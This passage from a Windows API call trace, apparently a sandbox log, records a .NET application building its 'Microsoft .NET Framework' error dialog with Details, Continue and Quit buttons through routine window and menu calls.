uIDEnableItem=0xf020, uEnable=0x1) returned 0 [0058.052] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf030, uEnable=0x1) returned 0 [0058.052] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0058.052] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0058.052] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf000, uEnable=0x1) returned 0 [0058.052] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae6bc | out: lpRect=0x3ae6bc) returned 1 [0058.052] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae61c | out: lpRect=0x3ae61c) returned 1 [0058.052] GetWindowRect (in: hWnd=0x201ca, lpRect=0x3ae61c | out: lpRect=0x3ae61c) returned 1 [0058.052] SetWindowPos (hWnd=0x201ca, hWndInsertAfter=0xffffffff, X=0, Y=0, cx=0, cy=0, uFlags=0x3) returned 1 [0058.052] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x46, wParam=0x0, lParam=0x3ae634) returned 0x0 [0058.053] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x46, wParam=0x0, lParam=0x3ae634) returned 0x0 [0058.053] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0058.053] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0058.053] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0058.053] NtdllDefWindowProc_W () returned 0x0 [0058.053] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0058.053] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.053] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.053] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.074] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0058.075] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0058.076] GetParent (hWnd=0x201ca) returned 0x0 [0058.076] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0058.076] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0058.076] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3ae3e4 | out: lpwndpl=0x3ae3e4) returned 1 [0058.076] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x47, wParam=0x0, lParam=0x3ae634) returned 0x0 [0058.076] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae394 | out: lpRect=0x3ae394) returned 1 [0058.076] GetWindowRect (in: hWnd=0x201ca, lpRect=0x3ae394 | out: lpRect=0x3ae394) returned 1 [0058.076] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.076] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.076] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.077] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x83, wParam=0x1, lParam=0x3ae218) returned 0x0 [0058.078] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.078] GetWindowLongW (hWnd=0x201ca, nIndex=-16) returned 113770496 [0058.078] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.078] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.078] GetSystemMetrics (nIndex=42) returned 0 [0058.078] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ae598, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.078] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ae598) returned 0x18 [0058.078] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.078] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.078] GetSystemMetrics (nIndex=42) returned 0 [0058.078] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ae598, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.078] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ae598) returned 0x18 [0058.078] GetCursorPos (in: lpPoint=0x2455524 | out: lpPoint=0x2455524*(x=166, y=29)) returned 1 [0058.078] MonitorFromPoint (pt=0xa9, dwFlags=0x1f) returned 0x10001 [0058.078] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae4e8 | out: lpmi=0x3ae4e8) returned 1 [0058.079] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0xa201082a [0058.079] GetDeviceCaps (hdc=0xa201082a, index=12) returned 32 [0058.079] GetDeviceCaps (hdc=0xa201082a, index=14) returned 1 [0058.079] DeleteDC (hdc=0xa201082a) returned 1 [0058.079] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae53c | out: lpmi=0x3ae53c) returned 1 [0058.079] GetWindowLongW (hWnd=0x201ca, nIndex=-16) returned 113770496 [0058.079] GetWindowLongW (hWnd=0x201ca, nIndex=-20) returned 327945 [0058.079] SetWindowLongW (hWnd=0x201ca, nIndex=-16, dwNewLong=46661632) returned 113770496 [0058.079] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7c, wParam=0xfffffff0, lParam=0x3ae610) returned 0x0 [0058.079] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7d, wParam=0xfffffff0, lParam=0x3ae610) returned 0x0 [0058.079] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.079] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.080] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.080] SetWindowLongW (hWnd=0x201ca, nIndex=-20, dwNewLong=327681) returned 327945 [0058.080] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7c, wParam=0xffffffec, lParam=0x3ae610) returned 0x0 [0058.080] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7d, wParam=0xffffffec, lParam=0x3ae610) returned 0x0 [0058.080] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.080] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.080] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.080] SetWindowPos (hWnd=0x201ca, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0058.080] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x46, wParam=0x0, lParam=0x3ae630) returned 0x0 [0058.081] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x83, wParam=0x1, lParam=0x3ae608) returned 0x0 [0058.081] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3ae3e0 | out: lpwndpl=0x3ae3e0) returned 1 [0058.081] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x47, wParam=0x0, lParam=0x3ae630) returned 0x0 [0058.081] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ae390 | out: lpRect=0x3ae390) returned 1 [0058.081] GetWindowRect (in: hWnd=0x201ca, lpRect=0x3ae390 | out: lpRect=0x3ae390) returned 1 [0058.081] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.081] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.081] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.082] RedrawWindow (hWnd=0x201ca, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0058.082] GetSystemMenu (hWnd=0x201ca, bRevert=0) returned 0xd0171 [0058.082] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3ae668 | out: lpwndpl=0x3ae668) returned 1 [0058.082] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf020, uEnable=0x1) returned 1 [0058.082] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf030, uEnable=0x1) returned 1 [0058.082] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0058.082] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0058.082] EnableMenuItem (hMenu=0xd0171, uIDEnableItem=0xf000, uEnable=0x1) returned 1 [0058.082] GetWindowLongW (hWnd=0x201ca, nIndex=-8) returned 0 [0058.082] IsWindowEnabled (hWnd=0x201ca) returned 1 [0058.082] ShowWindow (hWnd=0x201ca, nCmdShow=5) returned 0 [0058.082] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0058.082] GetCurrentActCtx (in: lphActCtx=0x3ae264 | out: lphActCtx=0x3ae264*=0x416cac) returned 1 [0058.082] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.082] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0058.082] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x56000000, X=0, Y=0, nWidth=64, nHeight=64, hWndParent=0x201ca, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x201f2 [0058.083] SetWindowLongW (hWnd=0x201f2, nIndex=-4, dwNewLong=1997940189) returned 5310438 [0058.083] GetWindowLongW (hWnd=0x201f2, nIndex=-4) returned 1997940189 [0058.083] SetWindowLongW (hWnd=0x201f2, nIndex=-4, dwNewLong=5355286) returned 1997940189 [0058.083] GetWindowLongW (hWnd=0x201f2, nIndex=-4) returned 5355286 [0058.083] GetWindowLongW (hWnd=0x201f2, nIndex=-16) returned 1174405120 [0058.083] GetWindowLongW (hWnd=0x201f2, nIndex=-12) returned 0 [0058.083] SetWindowLongW (hWnd=0x201f2, nIndex=-12, dwNewLong=131570) returned 0 [0058.083] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x81, wParam=0x0, lParam=0x3adcf8) returned 0x1 [0058.083] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x83, wParam=0x0, lParam=0x3adce4) returned 0x0 [0058.083] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x1, wParam=0x0, lParam=0x3adcf8) returned 0x0 [0058.084] GetWindow (hWnd=0x201f2, uCmd=0x3) returned 0x0 [0058.084] GetClientRect (in: hWnd=0x201f2, lpRect=0x3ada60 | out: lpRect=0x3ada60) returned 1 [0058.084] GetWindowRect (in: hWnd=0x201f2, lpRect=0x3ada60 | out: lpRect=0x3ada60) returned 1 [0058.084] GetParent (hWnd=0x201f2) returned 0x201ca [0058.084] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada60, cPoints=0x2 | out: lpPoints=0x3ada60) returned -24707573 [0058.084] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x5, wParam=0x0, lParam=0x400040) returned 0x0 [0058.084] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0058.084] GetClientRect (in: hWnd=0x201f2, lpRect=0x3adab8 | out: lpRect=0x3adab8) returned 1 [0058.084] GetWindowRect (in: hWnd=0x201f2, lpRect=0x3adab8 | out: lpRect=0x3adab8) returned 1 [0058.084] GetParent (hWnd=0x201f2) returned 0x201ca [0058.084] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3adab8, cPoints=0x2 | out: lpPoints=0x3adab8) returned -24707573 [0058.084] SendMessageW (hWnd=0x201f2, Msg=0x2210, wParam=0x1f20001, lParam=0x201f2) returned 0x0 [0058.084] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x2210, wParam=0x1f20001, lParam=0x201f2) returned 0x0 [0058.084] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0058.084] GetParent (hWnd=0x201f2) returned 0x201ca [0058.084] GetParent (hWnd=0x201f6) returned 0x201f8 [0058.085] SetParent (hWndChild=0x201f6, hWndNewParent=0x201ca) returned 0x201f8 [0058.085] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0058.085] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x46, wParam=0x0, lParam=0x3ae25c) returned 0x0 [0058.085] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x22, wParam=0x0, lParam=0x0) returned 0x0 [0058.085] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x47, wParam=0x0, lParam=0x3ae25c) returned 0x0 [0058.085] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x3, wParam=0x0, lParam=0x80040) returned 0x0 [0058.085] GetClientRect (in: hWnd=0x201f6, lpRect=0x3ada74 | out: lpRect=0x3ada74) returned 1 [0058.085] GetWindowRect (in: hWnd=0x201f6, lpRect=0x3ada74 | out: lpRect=0x3ada74) returned 1 [0058.085] GetParent (hWnd=0x201f6) returned 0x201ca [0058.085] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada74, cPoints=0x2 | out: lpPoints=0x3ada74) returned -24707573 [0058.085] GetClientRect (in: hWnd=0x201f6, lpRect=0x3adfa0 | out: lpRect=0x3adfa0) returned 1 [0058.085] GetWindowRect (in: hWnd=0x201f6, lpRect=0x3adfa0 | out: lpRect=0x3adfa0) returned 1 [0058.085] GetParent (hWnd=0x201f6) returned 0x201ca [0058.085] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3adfa0, cPoints=0x2 | out: lpPoints=0x3adfa0) returned -24707573 [0058.085] GetParent (hWnd=0x201f6) returned 0x201ca [0058.085] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0058.086] GetWindow (hWnd=0x201f6, uCmd=0x3) returned 0x0 [0058.086] SetWindowPos (hWnd=0x201f6, hWndInsertAfter=0x201f2, X=0, Y=0, cx=0, cy=0, uFlags=0x3) returned 1 [0058.086] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x46, wParam=0x0, lParam=0x3ae204) returned 0x0 [0058.086] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x22, wParam=0x0, lParam=0x0) returned 0x0 [0058.086] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x47, wParam=0x0, lParam=0x3ae204) returned 0x0 [0058.086] GetClientRect (in: hWnd=0x201f6, lpRect=0x3adf48 | out: lpRect=0x3adf48) returned 1 [0058.086] GetWindowRect (in: hWnd=0x201f6, lpRect=0x3adf48 | out: lpRect=0x3adf48) returned 1 [0058.086] GetParent (hWnd=0x201f6) returned 0x201ca [0058.086] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3adf48, cPoints=0x2 | out: lpPoints=0x3adf48) returned -24707573 [0058.086] GetParent (hWnd=0x201f6) returned 0x201ca [0058.086] GetWindow (hWnd=0x201f6, uCmd=0x3) returned 0x201f2 [0058.086] GetWindowThreadProcessId (in: hWnd=0x201f6, lpdwProcessId=0x3ae2d8 | out: lpdwProcessId=0x3ae2d8) returned 0x974 [0058.086] GetCurrentActCtx (in: lphActCtx=0x3ae264 | out: lphActCtx=0x3ae264*=0x416cac) returned 1 [0058.087] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.087] GetClassInfoW (in: hInstance=0x0, lpClassName="BUTTON", lpWndClass=0x2455934 | out: lpWndClass=0x2455934) returned 1 [0058.087] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0058.087] CoTaskMemAlloc (cb=0x58) returned 0x6b44640 [0058.087] RegisterClassW (lpWndClass=0x3ae11c) returned 0xc13c [0058.087] CoTaskMemFree (pv=0x6b44640) [0058.088] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0058.088] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.BUTTON.app.0.141b42a_r14_ad1", lpWindowName="&Details", dwStyle=0x5601000b, X=8, Y=94, nWidth=100, nHeight=23, hWndParent=0x201ca, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x201f4 [0058.088] SetWindowLongW (hWnd=0x201f4, nIndex=-4, dwNewLong=1942992021) returned 5355326 [0058.088] GetWindowLongW (hWnd=0x201f4, nIndex=-4) returned 1942992021 [0058.088] SetWindowLongW (hWnd=0x201f4, nIndex=-4, dwNewLong=5355366) returned 1942992021 [0058.088] GetWindowLongW (hWnd=0x201f4, nIndex=-4) returned 5355366 [0058.088] GetWindowLongW (hWnd=0x201f4, nIndex=-16) returned 1174470667 [0058.088] GetWindowLongW (hWnd=0x201f4, nIndex=-12) returned 0 [0058.088] SetWindowLongW (hWnd=0x201f4, nIndex=-12, dwNewLong=131572) returned 0 [0058.088] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x81, wParam=0x0, lParam=0x3adcf8) returned 0x1 [0058.089] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x83, wParam=0x0, lParam=0x3adce4) returned 0x0 [0058.089] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x1, wParam=0x0, lParam=0x3adcf8) returned 0x0 [0058.089] SendMessageW (hWnd=0x201f4, Msg=0x2055, wParam=0x201f4, lParam=0x3) returned 0x2 [0058.089] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0058.089] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0058.089] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0058.089] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0058.089] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0058.089] RedrawWindow (hWnd=0x201f2, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0058.089] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0058.092] RedrawWindow (hWnd=0x201f6, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0058.092] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0058.092] RedrawWindow (hWnd=0x201f4, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0058.092] RedrawWindow (hWnd=0x201ca, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0058.092] GetWindow (hWnd=0x201f4, uCmd=0x3) returned 0x201f6 [0058.092] GetClientRect (in: hWnd=0x201f4, lpRect=0x3ada18 | out: lpRect=0x3ada18) returned 1 [0058.093] GetWindowRect (in: hWnd=0x201f4, lpRect=0x3ada18 | out: lpRect=0x3ada18) returned 1 [0058.093] GetParent (hWnd=0x201f4) returned 0x201ca [0058.093] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada18, cPoints=0x2 | out: lpPoints=0x3ada18) returned -24707573 [0058.093] SetWindowTextW (hWnd=0x201f4, lpString="&Details") returned 1 [0058.093] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0xc, wParam=0x0, lParam=0x24537f8) returned 0x1 [0058.093] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x5, wParam=0x0, lParam=0x170064) returned 0x0 [0058.093] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x3, wParam=0x0, lParam=0x5e0008) returned 0x0 [0058.093] GetClientRect (in: hWnd=0x201f4, lpRect=0x3ada70 | out: lpRect=0x3ada70) returned 1 [0058.093] GetWindowRect (in: hWnd=0x201f4, lpRect=0x3ada70 | out: lpRect=0x3ada70) returned 1 [0058.093] GetParent (hWnd=0x201f4) returned 0x201ca [0058.093] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada70, cPoints=0x2 | out: lpPoints=0x3ada70) returned -24707573 [0058.093] SendMessageW (hWnd=0x201f4, Msg=0x2210, wParam=0x1f40001, lParam=0x201f4) returned 0x0 [0058.093] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x2210, wParam=0x1f40001, lParam=0x201f4) returned 0x0 [0058.093] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0058.093] GetParent (hWnd=0x201f4) returned 0x201ca [0058.093] GetCurrentActCtx (in: lphActCtx=0x3ae264 | out: lphActCtx=0x3ae264*=0x416cac) returned 1 [0058.094] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.094] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0058.094] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.BUTTON.app.0.141b42a_r14_ad1", lpWindowName="&Continue", dwStyle=0x5601000b, X=225, Y=94, nWidth=100, nHeight=23, hWndParent=0x201ca, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x201e6 [0058.094] SetWindowLongW (hWnd=0x201e6, nIndex=-4, dwNewLong=1942992021) returned 5355326 [0058.094] GetWindowLongW (hWnd=0x201e6, nIndex=-4) returned 1942992021 [0058.094] SetWindowLongW (hWnd=0x201e6, nIndex=-4, dwNewLong=5355430) returned 1942992021 [0058.095] GetWindowLongW (hWnd=0x201e6, nIndex=-4) returned 5355430 [0058.095] GetWindowLongW (hWnd=0x201e6, nIndex=-16) returned 1174470667 [0058.095] GetWindowLongW (hWnd=0x201e6, nIndex=-12) returned 0 [0058.095] SetWindowLongW (hWnd=0x201e6, nIndex=-12, dwNewLong=131558) returned 0 [0058.095] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x81, wParam=0x0, lParam=0x3adcf8) returned 0x1 [0058.095] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x83, wParam=0x0, lParam=0x3adce4) returned 0x0 [0058.095] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x1, wParam=0x0, lParam=0x3adcf8) returned 0x0 [0058.095] SendMessageW (hWnd=0x201e6, Msg=0x2055, wParam=0x201e6, lParam=0x3) returned 0x2 [0058.095] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0058.095] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0058.095] GetWindow (hWnd=0x201e6, uCmd=0x3) returned 0x201f4 [0058.095] GetClientRect (in: hWnd=0x201e6, lpRect=0x3ada18 | out: lpRect=0x3ada18) returned 1 [0058.095] GetWindowRect (in: hWnd=0x201e6, lpRect=0x3ada18 | out: lpRect=0x3ada18) returned 1 [0058.095] GetParent (hWnd=0x201e6) returned 0x201ca [0058.095] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada18, cPoints=0x2 | out: lpPoints=0x3ada18) returned -24707573 [0058.095] SetWindowTextW (hWnd=0x201e6, lpString="&Continue") returned 1 [0058.096] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0xc, wParam=0x0, lParam=0x245370c) returned 0x1 [0058.096] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x5, wParam=0x0, lParam=0x170064) returned 0x0 [0058.096] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x3, wParam=0x0, lParam=0x5e00e1) returned 0x0 [0058.096] GetClientRect (in: hWnd=0x201e6, lpRect=0x3ada70 | out: lpRect=0x3ada70) returned 1 [0058.096] GetWindowRect (in: hWnd=0x201e6, lpRect=0x3ada70 | out: lpRect=0x3ada70) returned 1 [0058.096] GetParent (hWnd=0x201e6) returned 0x201ca [0058.096] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201ca, lpPoints=0x3ada70, cPoints=0x2 | out: lpPoints=0x3ada70) returned -24707573 [0058.096] SendMessageW (hWnd=0x201e6, Msg=0x2210, wParam=0x1e60001, lParam=0x201e6) returned 0x0 [0058.096] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x2210, wParam=0x1e60001, lParam=0x201e6) returned 0x0 [0058.096] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0058.096] GetParent (hWnd=0x201e6) returned 0x201ca [0058.096] GetCurrentActCtx (in: lphActCtx=0x3ae264 | out: lphActCtx=0x3ae264*=0x416cac) returned 1 [0058.096] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.097] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0058.097] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.BUTTON.app.0.141b42a_r14_ad1", lpWindowName="&Quit", dwStyle=0x5601000b, X=330, Y=94, nWidth=100, nHeight=23, hWndParent=0x201ca, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x201e8 [0058.097] SetWindowLongW (hWnd=0x201e8, nIndex=-4, dwNewLong=1942992021) returned 5355326 [0058.097] GetWindowLongW (hWnd=0x201e8, nIndex=-4) returned 1942992021 [0058.097] SetWindowLongW (hWnd=0x201e8, nIndex=-4, dwNewLong=5355470) returned 1942992021 [0058.097] GetWindowLongW (hWnd=0x201e8, nIndex=-4) returned 5355470 [0058.097] GetWindowLongW (hWnd=0x201e8, nIndex=-16) returned 1174470667 [0058.097] GetWindowLongW (hWnd=0x201e8, nIndex=-12) returned 0 [0058.097] SetWindowLongW (hWnd=0x201e8, nIndex=-12, dwNewLong=131560) returned 0 [0058.097] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x81, wParam=0x0, lParam=0x3adcf8) returned 0x1 [0058.097] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x83, wParam=0x0, lParam=0x3adce4) returned 0x0 [0058.097] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e8, Msg=0x1, wParam=0x0, lParam=0x3adcf8) returned 0x0 [0058.098] SendMessageW (hWnd=0x201e8, Msg=0x2055, wParam=0x201e8, lParam=0x3) returned 0x2 [0058.098] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x129, wParam=0x0, lParam=0x0) 